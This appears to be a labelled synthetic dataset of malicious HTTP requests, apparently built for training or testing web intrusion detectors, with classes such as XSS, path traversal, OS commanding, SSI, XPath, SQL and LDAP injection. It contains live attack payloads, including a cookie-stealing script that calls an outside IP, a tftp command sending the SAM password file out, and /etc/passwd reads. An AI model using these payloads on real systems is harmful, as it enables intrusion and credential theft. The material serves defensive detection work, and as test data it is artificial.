GET /aaQk2m/a8tc1d/bbXi0g3lCiZ/oyleioatttrs.js?thnngunfwhv=6782892&RVo@sp6oFQ=hQim3ftnddou&nn=4409&hdao=%3Cdiv+++style+%3D++++%22+++++binding%3A+url%28%5Bhttp%3A%2F%2Fwww.attaolns.com%2Fscript%2Fiius.aspx%5D%29%3B++++%22+%3E&enraaIrae=503&23samNd=lib+8ep&rHeight9Y=ed&InoeyfGwoemne=oteDraSib&t7hidiasi4ra=ch%29iT+e&NI5v_V=processing-instructionp+5group+bytMc HTTP/1.0
Host: 202.96.54.223
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 162.119.135.49
Cookie: hsiaepnd=e94l;oiai9l8cun5Niee=gLmjg5qWo0;isbaRoegee=qcwi6I9aeT
Cookie2: $Version="57"
Date: Sun, 26 Nov 06 18:18:31 CET
ETag: "xslHmXI@16wFajcv"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Mon, 10 May 04 01:17:50 UTC
If-Unmodified-Since: Fri, 31 Dec 04 18:21:27 GMT
If-Match: *
If-None-Match: "Jcoz8eEx4bFjMYp"
If-Range: *
Max-Forwards: 0
MIME-Version: 0.3
Pragma: tziO=et
Proxy-Authorization: Basic ZW5jU3JiaTpwQWFvcmU=
Authorization: Basic ZWVpbzpDSGt6N3R0aw==
Range: 3529-807061,329-36,-0646
Referer: /ishevi/sntx/iabg.gif
TE: trailers
Trailer: If-Match
User-Agent: noma/7.8
UA-CPU: StrongARM
UA-Disp: 815,562,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1670x058
Via: thtrtm/3.6 103.127.64.240
Transfer-Encoding: identity
Upgrade: sEtli/1.4, eqt/6.4, eixu/1.5
Warning: 420 47.114.190.11 "tisyat2nhQero" 
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 981746915
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47406
Start - Id: 46942
class: XSS
PUT /TBYupdatescriptP5EpmPgNb/h@bbRMY0ppT/xVn2cHusr8Q57NKE/o41skicebStzbunD.jpg? HTTP/1.0
Content-Length: 74
Content-Language: ea
Content-Encoding: deflate
Content-Location: /teMhose/inarUSn/7Ttrtiy/ohEraA.swf
Content-MD5: ZXlydGE4ZTBGbnRzeXRFcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 May 09 16:34:30 CET
Last-Modified: Thu, 15 Jun 06 20:48:30 GMT
Host: 66.73.162.245
Connection: close
Accept: image/png, application/*;q=0.7, audio/basic;q=0.9
Accept-Charset: iso-8859-6;q=0.6, hz-gb-2312, iso-8859-8, hz-gb-2312;q=0.3
Accept-Encoding: 
Accept-Language: 6ielrxe-9i, ttd1tbts-eao97Qa;q=0.0
Cache-Control: no-transform
Client-ip: 193.249.16.142
Cookie2: $Version="051"
Date: Tue, 21 Nov 06 03:48:16 CET
ETag: "2QUjnUW_IVja0L.6aDN"
Expect: ocr3E
If-Modified-Since: Mon, 27 Jul 09 08:32:19 GMT
If-Unmodified-Since: Thu, 27 Jul 06 19:44:43 CET
If-Match: "RyE260VFVQOsLC1@LfU5"
If-Range: Sun, 03 Dec 06 16:27:16 GMT
Max-Forwards: 026
MIME-Version: 9.2
Pragma: no-cache
Authorization: ctur shTAoFnr=aoeeisi
Range: 16111-
Referer: http://erqc.org/Y3ekp.php4
TE: gzip;q=0.1,trailers,trailers
User-Agent: Mozilla/7.4 (Machintosh; U; PPC 5.6; 0a-an; rv:8.5.3) Gecko/65545470
Via: HTTP/3.7 www.eaftusE.css:17, HTTP/0.9 www.59sByr.jpg, 6.8 143.145.105.237
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 

eohdetot=&{[alert   ('ke2w6ss');]};&ssilduhoon=94508

End - Id: 46942
Start - Id: 45807
class: PathTransversal
GET /i-b.shtml?ozyleNmhdc8j=e3ww%40&tceN9=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fasllte%2Fmeleintima%2Fnechns%2Fllna.php3&neel=g%7Ei9%5C&mw-IBFLQU6sam6=44346&tt5qxo=0&mu=neueir4itEueoevhss&lsilh99=Hehe&aygnts2an8tpt=iceii&Sdurenaamas=to9saa6e&rlk7r=o1UxKxJI.HNb&ieq1mL=a+d%3F HTTP/1.0
Host: 13.120.205.109:90956
Connection: HEsaeoS
Accept: */*;q=0.9
Accept-Charset: ks_c_5601-1987;q=0.1, iso-8859-3;q=0.3, x-mac-hebrew
Accept-Encoding: compress;q=0.4, deflate, identity;q=0.7
Accept-Language: *
Cache-Control: ra='e'
Client-ip: 241.101.131.168
Cookie: jFrs4.=~4/symcat
Cookie2: $Version="085"
Date: Tue, 27 Apr 04 04:37:47 CET
ETag: "RXzBxEUPj84ka@n1rH"
Expect: eahnlea=nhotTe4
From: eswh1@draenetio.it
If-Modified-Since: Sat, 12 May 07 06:31:06 GMT
If-Unmodified-Since: Sat, 30 Jan 10 21:02:28 CET
If-Match: "F-9ztL_jB_iUC_D8"
If-None-Match: "la8MYH_M63Ew4HEX"
If-Range: Thu, 13 Mar 08 24:28:32 GMT
Max-Forwards: 03
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: Basic bnQ0bTU6ZWlzb2g2bg==
Range: 10-894039
Referer: /titoOo/nopecmma/w1P9b/iorn.php3
TE: trailers,chunked,chunked
Trailer: Authorization
User-Agent: eehe/5.4.2
UA-CPU: PowerPC
UA-Disp: 1489,7899,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9422x259
Via: 8.9 www.oa18qena.htm, 0.9 58.13.223.27, crnAhk/8.8 www.vsainsi.gif
Transfer-Encoding: compress
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 157.18.224.28
X-Serial-Number: 97437776345
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45807
Start - Id: 44614
class: OsCommanding
GET /ajexfz8hms.exe?ekIumeqoftsET=200.235.1.113++%7C++tftp++-i+++++36.110.218.221+++++PUT+sam._ HTTP/1.0
Host: 142.67.62.228
Connection: close
Accept: text/xml;q=0.4, video/*;q=0.1
Accept-Charset: *
Accept-Encoding: compress;q=0.1, identity, deflate, gzip, identity
Accept-Language: 6dl-RdsKdei;q=0.3, emls-iretn3d, i8ePraa-dizdh;q=0.9, l6e8-4r;q=0.1, tnwfpie-7INbeloo
Cache-Control: min-fresh=79
Client-ip: 187.185.41.118
Cookie: -AQYMis=ieioHnlh;ae=t6diezttk--child;bnet= 
Cookie2: $Version="4"
Date: Tue, 11 Jan 05 01:49:32 GMT
ETag: "_6Y7jSzR68UTRzizu44"
Expect: 100-continue
From: yrtaag@x3hp5xn5i.net
If-Modified-Since: Tue, 19 Jun 07 17:48:55 CET
If-Unmodified-Since: Thu, 05 Oct 06 12:29:28 UTC
If-Match: "JUf9cCc.LZTIJK58Vc"
If-None-Match: *
If-Range: Fri, 06 May 05 12:01:31 UTC
Max-Forwards: 27
MIME-Version: 3.4
Pragma: ohsdd3='c'
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Basic aWVhYmdjdzpvZW9pbGQ=
Range: 6245-9,4665-34,-76
Referer: /AowmaE7.mdb
TE: trailers,trailers
Trailer: Host
User-Agent: tee6teonm
UA-Disp: 0488,6492,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/5.3 188.64.121.58
Transfer-Encoding: gzip
Upgrade: oTe/6.3, en2/3.5, hq1ltn/9.0, 9elp1/2.1, Esotly/2.0
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 117.132.107.47
X-Serial-Number: 92326230406152
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44614
Start - Id: 47002
class: XSS
GET /uNn0sPXv/nun/Gei7lgdxtermMxhl2perl/eoyemehsteheeouolr/gGUCGck/dtudeaye/2an80/t4iadculOaugss35siwr/rCpNJSDH/enuooi1n0NI/esmh/Tm8l.mdb?rdioZti=aB5&oIevueo=743819&o4om4ua=9872262&hhrse=a2fYasRj&trwo9ai0qm=9&t85=454931&RwAEu9k@bodyh8f=eVY17k&oronzp=eohsAsneu0&ejxye3yGT=%3Ca+++++href%3D+++%22+++++about%3A%3Cs%26%2399%3Bript++++%3E%5Bwindow.open%28%27http%3A%2F%2F121.148.243.81%2Fleic.asp%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E++++%22%3E HTTP/1.1
Host: www.Hte0ie.uk
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252, iso-8859-5, iso-8859-15;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 0.51.121.220
Cookie: ugnpd=21;0log..k2=oeaua;smdaI=o<aiille%insert
Cookie2: $Version="757"
Date: Sun, 19 Mar 06 01:57:30 UTC
ETag: "o8HdQMwRnEl_XlX"
Expect: 100-continue
From: vsl8rn@orhoE.de
If-Modified-Since: Thu, 26 Aug 04 21:11:59 UTC
If-Unmodified-Since: Mon, 26 Jan 09 14:59:57 CET
If-Match: *
If-None-Match: "FdOH1T9pSY3.jMVK0r"
If-Range: Thu, 15 Mar 07 12:07:43 UTC
Max-Forwards: 010
MIME-Version: 0.5
Pragma: knN9mase=is
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: NTLM c2VtbWNSZWV1cHJqZWF0dWRlaE1lNm1yYzNsTmlhY2VuMUFsYm9paA==
Range: 5-22964
Referer: http://www.arxmlej.com/teeibE/hIhr/yinzlea/on5eknea/frsm.jsp
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/5.3 (Machintosh; U; Mac OS X 8.2; la-sl; rv:1.6.4) Gecko/57629254
UA-Disp: 199,139,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 238x292
Via: iC8hr/6.4 www.tsttelat.shtml, HTTP/4.4 118.170.113.182, yDblR/2.8 www.h1geeLtm.shtml
Transfer-Encoding: gzip
Upgrade: 5ve/2.6, a1rbm/0.6
Warning: 544 www.ccrt.gif "oteAehiueo" "Fri, 15 Apr 05 23:43:34 GMT"
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 09560109
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47002
Start - Id: 46295
class: PathTransversal
GET /ley5rrLtenifnsubae/m0/bwoUh/osPB3wHncV_/fzwuoou/mrii/tTxmlsJXBXZhSS7J/aNJ/ds/Q.JcopyGmb@.sh?e0s0=0380051106&eaaetqnsI=iaa&WYcNGWUq_=bgure9eane&Hts=4&.documentinsertY=445099&hfo=qGeo6c9ms&096afen3wpu=tcmd&saouv2smiO7h=49808036&IXGrpG_19mr=%2Fetc%2Fpasswd&ynr=tual4rehtdi HTTP/1.0
Host: 202.97.154.126:76
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 54.146.114.194
Cookie: s8=hNauwilsGlt2aoe
Cookie2: $Version="98"
Date: Wed, 27 Jan 10 18:50:45 CET
ETag: W/"l1XkmFGdW1ggoyh14oL"
Expect: 100-continue
From: tTSp@hlesers0h1.uk
If-Modified-Since: Mon, 19 Apr 10 17:56:30 CET
If-Unmodified-Since: Thu, 13 Aug 09 03:42:56 UTC
If-Match: *
If-None-Match: "BWYnQVYZZntYhMidtpH"
If-Range: *
Max-Forwards: 298
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: Digest response="ac09Dfddbc6c311F1b7fbca4cD813C1F"
Range: 5-,07-2
Referer: /H4do/e5stIab/rsst.asp
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.4 (Windows; U; Win 9x 0.1; yn-in; rv:8.8.1) Gecko/74948428
UA-CPU: 68000
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 4.3 255.38.36.72:275, 6.0 www.Yotnu.htm
Transfer-Encoding: identity
Upgrade: 0opl/6.2
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 0260257
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46295
Start - Id: 45206
class: PathTransversal
GET /./? HTTP/1.1
Host: 208.227.12.34:49189
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.2, deflate;q=0.0, compress
Accept-Language: ad6he-teqs;q=0.6, lead-obzas;q=0.8, 1o-d, dsmediiO-iT, tsIib-os;q=0.1
Cache-Control: max-age=6525
Client-ip: 125.250.245.160
Cookie: aOhtROtt=ptaeaGfoAw1enodaet;neebhnAe=658;rAr=cuseo1civro;End=en;6yimfstodqa=yttopaqcToncos;llipeO=onnusroR| \rT4tli
Cookie2: $Version="6"
Date: Wed, 18 Feb 09 08:06:53 CET
ETag: W/"Xmo5m4bH7_.musI"
Expect: oq0ewer7
From: nhste@jp1ihu.be
If-Modified-Since: Sun, 24 May 09 02:51:37 CET
If-Unmodified-Since: Fri, 15 Aug 08 13:27:35 CET
If-Match: *
If-None-Match: "ql1LzEgDmoYabfZ.U"
If-Range: Sun, 15 Feb 09 18:41:00 CET
Max-Forwards: 28
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: NTLM dG56RWllc2hvczZub05hbzhhaXNwcjd0YWV5bmk3b2xy
Range: 706278-,584316-,-67
Referer: http://www.aoelke.fr/Lenl/aneur/rxehsajb.bin
TE: trailers,chunked;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/5.7 (Windows; U; WinNT 5.4; sr-oo; rv:7.5.5) Gecko/68888975
UA-CPU: Sparc
UA-Disp: 749,556,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0142x8254
Via: FTP/1.0 www.nesDsdad.js:89, FTP/4.6 36.194.95.194, 4.1 134.5.100.143
Transfer-Encoding: deflate
Upgrade: eimdea/6.6
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 157.255.96.148
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45206
Start - Id: 40548
class: SSI
GET /tPC9Adf_BXOE-7/rotoUrns/s689ewReP2xtermnph-P/aflOXKTly1/sOymKUCJAg7d6M9fQ4k/mrhUxvv9xU@n8/epOa38YNEVWVBI39t.png?-@QunionP=aoJu&nst=5&atqomieneuspd5=809114634&df7rififea=4pdB+udr+e8n&ia3a=TtoifnekeJo6jbtE5&ouemuysn=ehe&acneu=%3C%21--+++++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&hmctpscxci=3i+e-Ao%3Ch%7E6ti&kM@Nwjp=nFmARHFF3uv&xc=36399265&oaHio=3213&Rdimhse=e%2Bs%5BDaloe9+divmailn&yKytYcYadminWc=bea HTTP/1.0
Host: 45.19.81.123
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 32.122.234.119
Cookie: oVFIa5ZQDgL=26762
Cookie2: $Version="45"
Date: Mon, 07 Sep 09 08:03:13 UTC
ETag: "jnUwgr1CydoaN3UHm.bx"
Expect: 100-continue
From: dllx8s1@F9aYw68.biz
If-Modified-Since: Tue, 07 Feb 06 14:38:37 UTC
If-Unmodified-Since: Thu, 01 Jun 06 22:34:20 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 143
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: eyuU tZee=sndi
Authorization: uhoI ah7yoa7o=nnhehre
Range: -71,-53480
Referer: http://www.tfwv.be/ttz1x9/rTVate/f4mTm3o/49nhe.jsp
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: s0F6.Hotx http://www.ptitnS.gov
UA-CPU: MIPS
UA-Disp: 5247,6150,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0457x8183
Via: 3.5 www.de66.jpeg
Transfer-Encoding: gzip
Upgrade: enoi6/9.0, nmeG/6.4, qlt/3.9
Warning: 564 www.dt5nmh.gif "yhcyTbTnls0" 
X-Forwarded-For: 172.8.17.63
X-Serial-Number: 9009184147
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40548
Start - Id: 48893
class: XPathInjection
GET /PPZusrk56OckjHls/fNfQTjMYQM/id6mRddtW3nbr4h/@zDlsEQWz/ilocnlxslrrNOsr5ol/rNR/punionK4AizIsEform/snbwi/iGTsdIlUprJr/HWftmp/Rkcruhntfsl/seohao0ltiEfm.shtml?idhis1ytss5=sozTBWHy&IobpsesrciH=73213431&muIg5fomb3eaI=95429+++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++++3660%3D&jir=%7Cidsr&mlS=3514274&omtcnCi5eDhN=44&sociEsarnz6wb=a65mX.a8u&NncnaTihn=anlehd3&ccwfrnWsdhud1u7=72716928&Rr7C6passwdwfrom=2egitiheswulikesohtpass%5Dsn&6t=017015&gtahgs=documentns HTTP/1.0
Host: 106.46.232.198
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: e7esttu-e3t, Rnrp-npeiaktg
Cache-Control: no-cache
Client-ip: 78.151.63.45
Cookie: usatsUwilsio=n 1ik
Cookie2: $Version="74"
Date: Sat, 27 Aug 05 21:29:29 UTC
ETag: W/"TrWjpzVlNZvmYDKkV"
Expect: 100-continue
From: Cwemtetz@wf3dzee.it
If-Modified-Since: Thu, 16 Feb 06 23:01:17 GMT
If-Unmodified-Since: Sun, 24 Apr 05 19:00:18 GMT
If-Match: *
If-None-Match: "b5U_PH56mbZCgza1K3bn"
If-Range: Sun, 29 Nov 09 16:47:01 GMT
Max-Forwards: 186
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: crIt 4rsmildy=qdtdsat
Range: 87-22
Referer: /lDbLei.swf
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/0.5 (Machintosh; U; Mac OS X 2.6; ni-g4; rv:8.5.0) Gecko/17759391
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1420x8323
Via: aiaoc/6.2 www.wgAaa.js, 5.6 132.104.191.101, 9.0 www.nnsptt.png
Transfer-Encoding: deflate
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 766 www.wbdsi.gif "iiitgc4re" "Thu, 08 May 08 03:06:26 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 981784
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48893
Start - Id: 40833
class: SSI
GET /1cjsl9lsradseirte8U/noT/HOJ-N-OW6Pwhf/lklseVagotngowd2/eY_Pr.C56JsOU8k8@-8a/Mxv53YY9dc/rDaPUegt/sgnhpehr3yyrn/tN/0orhtieoeawwOe/ie7n2.jpg?3nt=484988905&KE6sKwinntm=eaag5ykozbow&auoogcmi=apc%3Ei&wJIT=0793353&Tobfn=irwnpyefyaieeo&aiirsaiha=9037&ehimu=%3C%21--%23odbc++statement++++%3D++%22select+++++sspe%2C+++ecuil%2C+++++obl++++from+++++Ksdot6efSE++order+by+1%2C++++669%2C++++8%22++--%3E&v1cosnnhzmi=shaa%2F&8ettiJDeee=eshaedThs8nb&tTcsApijhChani=bhiphp%3F%5Cesv%27aa9-Y-eeax&nNdtlQdheunrup=accmdSI&ew=wnn9ihevilaibd HTTP/1.1
Host: 183.22.240.3
Connection: gwecEhCm
Accept: */*
Accept-Charset: x-mac-cyrillic, x-mac-icelandic;q=0.4, isiri-3342
Accept-Encoding: 
Accept-Language: s-t8oer;q=0.1
Cache-Control: only-if-cached
Client-ip: 246.243.47.248
Cookie: BzoNiY7=hteval e\3rm':;dnonGa=0733256;KBlYzdhx7S=zaTahhnsotevosnT;d0ria=Eet<
Cookie2: $Version="4"
Date: Sun, 29 Oct 06 10:09:03 UTC
ETag: W/"@ygQvx5XKQ4FDOQ2"
Expect: 6zksh=yeeso;ReHszc
From: heeo2q@daRia.de
If-Modified-Since: Wed, 26 Sep 07 05:29:03 UTC
If-Unmodified-Since: Sat, 13 Nov 04 14:11:02 GMT
If-Match: "Jo7ny@NkLhw3Y-@ghQ@"
If-None-Match: "rZc1_isaOo7r18Hs."
If-Range: "DNRHiPsmoDHj8.p@H"
Max-Forwards: 025
MIME-Version: 0.3
Pragma: ab5S='et9ie'
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: Basic T2FudGFoOm90Z3hsZW93
Range: 4-703669
Referer: http://ido0i2I0.cz/7slt/eeEJ/Eyveo/edNts.jsp
TE: chunked;q=0.3,trailers,trailers
Trailer: Accept
User-Agent: ashtwetnu
UA-CPU: PowerPC
UA-Disp: 7808,940,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7606x249
Via: FTP/2.2 164.251.101.92, HTTP/3.4 246.153.35.173, FTP/0.5 www.edattOt.png
Transfer-Encoding: identity
Upgrade: aBsae/7.5, Ars/0.8, 2ba7f/1.4, ikeqi/5.4
Warning: 943 www.nneettw.tiff "el9tus" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 40747153756954
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40833
Start - Id: 41434
class: SqlInjection
POST /zCBCF5n/Teeu4ivdex/GddaNjsleetevrt/QB/UkpassthruVDkc/iTm2ORu3obaFrwoRr/sauhpndltT/ouezVtpjbc.jpeg? HTTP/1.0
Content-Length: 235
Content-Language: tocnrhhr,tilWseam
Content-Encoding: compress
Content-Location: /i2tevg/sbct/Hjnx7u/henRtnc/qubtrE.cgi
Content-MD5: RDRSZEp0YWUxczRhaWR0ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Aug 07 12:11:03 UTC
Last-Modified: Fri, 02 Mar 07 22:16:11 UTC
Host: 163.216.87.168:813
Connection: close
Accept: */*
Accept-Charset: windows-1258, x-mac-japanese;q=0.9, x-mac-arabic;q=0.3, cp-936
Accept-Encoding: compress;q=0.3, compress, compress
Accept-Language: cfs-5r1xoo, eruhrest-cce;q=0.7, 8s-ndreh;q=0.9, e9souR-bcmsc;q=0.7
Cache-Control: min-fresh=136
Client-ip: 196.211.227.198
Cookie: rtbh19h=8351;drrhe2n7tstghh=anouig;taNhiotalNwtno=hzb3 m5systemDu=2dt;et8=e rsiealtdocumentw;rrfedeiwimyhb=6329
Cookie2: $Version="67"
Date: Tue, 25 Apr 06 07:38:23 GMT
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: enoavte1=egee
From: m7bmf@6ittvesi.net
If-Modified-Since: Thu, 08 Jun 06 17:27:45 GMT
If-Unmodified-Since: Tue, 06 Oct 09 09:16:45 UTC
If-Match: *
If-None-Match: "Ub1oI.0Bnjqt9.p16"
If-Range: *
Max-Forwards: 820
MIME-Version: 0.4
Pragma: eVeccvh='tyavS4t0'
Proxy-Authorization: Digest qop=ymsaBhdy
Authorization: Digest qop=4eBn
Range: -86
Referer: http://www.sin3.cz/erat.css
TE: deflate;q=0.2
Trailer: Date
User-Agent: aa7nopT
UA-CPU: MIPS
UA-Disp: 5047,1180,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x118
Via: 8ep/9.3 165.94.165.5, 5.4 www.mxotm.gif:18090, oupu/2.5 www.tHmahw7t.tiff:96
Transfer-Encoding: identity
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 594 www.eduo.css "iv5whwy" "Sun, 10 Aug 08 19:07:44 UTC"
X-Forwarded-For: 47.63.17.194
X-Serial-Number: 9168693821015244526
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

cuO-N@C9mcopyqQ=unionL&zneFgi=ort77haoeNfn&sjo=vixnr&itl6wq=ue&ietaz=etalnyvhn4eeana&iE='  )   UNION   ALL SELECT    29,064,749,82,8     FROM p3uo   WHERE     (  ''    =  '&ur5enhX5Oipe=6hboot.ini(efwWhopsrreepq

End - Id: 41434
Start - Id: 42497
class: SqlInjection
GET /homemailw3HxamlikeWXcmdi-/Olfo5s.NQO/bkfoiaeor7/2eTsgig8hoYooax8sr/axcTQhRLeTt8yFM/wJ/ZSCz/RrnaotEyyTdn9tiatiu/fIrdshtavl9eehse/sce9satrT9e/gO5o8w8QiWElCq.shtml?hcqh3in7agl=7463375569&Ecvot=elri+styleirlnUi2tn&Vlzon=5574&pcdqserudykqs=304606&Aa6xtM=oesnaJefe3utkCi&lgbLtstii=ipdarso&y36rsmaga8=having6&W3qxe_connect=qwer%27+++or+++APm6van_v.Account%3D%27Aihftv1%40HelyE0.com&xrfYqH=tetf2E%5Dhdivm%7C3iih&inuaunu=6123121336 HTTP/1.1
Host: www.iwczokeoi.it:23593
Connection: eondUp
Accept: */*
Accept-Charset: iso-8859-8, x-mac-greek, x-mac-icelandic;q=0.1, iso-8859-2, windows-1254
Accept-Encoding: gzip, compress;q=0.3, deflate, compress, identity
Accept-Language: *;q=0.1
Cache-Control: min-fresh=38194
Client-ip: 196.189.248.125
Cookie: om2bon2eaerebn=l;eroa8rgterhheo=asdhETiomOshv;wnlraaAfsEnetnh=e@5lB.N@7e;oeebhd=6434;IgVh6S5openB6xh=ire0d
Cookie2: $Version="45"
Date: Wed, 11 Feb 09 12:58:34 UTC
ETag: W/"R_iyxOFyTu-4qGue"
Expect: en3i=hrestiae;eenei5es
From: sheo@RafNi.uk
If-Modified-Since: Sat, 25 Nov 06 11:47:09 CET
If-Unmodified-Since: Fri, 20 Jun 08 08:02:42 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 26 Apr 06 10:50:26 UTC
Max-Forwards: 1261
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: utooek cAhe=prlkCm
Range: 7-59040
Referer: http://nDm0oqh.gov/cs5sitt/fnsd/irrthgdR/imeel.bin
TE: gzip;q=0.7,trailers
Trailer: Transfer-Encoding
User-Agent: o6syib4Qnt (anqUX7fwpm)
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: 5.3 11.222.87.252, 4.3 151.61.44.116
Transfer-Encoding: compress
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 210 56.86.237.225 "csttoifnOdeql" "Sat, 01 Mar 08 16:31:34 CET"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 029543372781579317
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42497
Start - Id: 37569
class: LdapInjection
PUT /y-cqjh6.r-cx/x1rrwG1aehb-v/vwaAn7lfonequej/azgreoiO7NDNeO2rtv/tcotzeQ7rwifddsLi/nwltG73IUOr4gzs.@uq2.pl? HTTP/1.0
Content-Length: 137
Content-Language: shn
Content-Encoding: deflate
Content-Location: /nnulx/mLui/scytAae/3jtoitsi/auae.nsf
Content-MD5: cnRhaWNpb2VpdXJ0YzNyeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 May 08 16:18:50 CET
Last-Modified: Thu, 24 Apr 08 03:40:27 UTC
Host: www.h3Nns.org:80
Connection: keep-alive
Accept: application/*, application/*, application/postscript;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 204.9.113.47
Cookie: trro9bentzfh=nr;iijoeyas0yolin=334
Cookie2: $Version="03"
Date: Mon, 08 Aug 05 14:18:44 GMT
ETag: W/"opjc3ToLOFC@rsjI2Os"
Expect: s7hcLn
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sun, 13 Mar 05 05:31:21 GMT
If-Unmodified-Since: Tue, 02 Nov 04 05:12:08 UTC
If-Match: "HEp0ai61ornC7BMazM"
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Mon, 16 May 05 05:58:40 GMT
Max-Forwards: 30
MIME-Version: 8.8
Pragma: cRrro=slgpp
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: Basic cmloamVyZ2U6dG9pbg==
Range: 36-,-7
Referer: /hHna9u/nmottuo/oodaei.doc
TE: gzip;q=0.6,trailers
Trailer: If-None-Match
User-Agent: Mozilla/5.2 (X11; U; Solaris 1.8; Cp-an; rv:0.4.2) Gecko/02469014
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 299x8794
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: fwfa4G; traj9y=Sargave
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

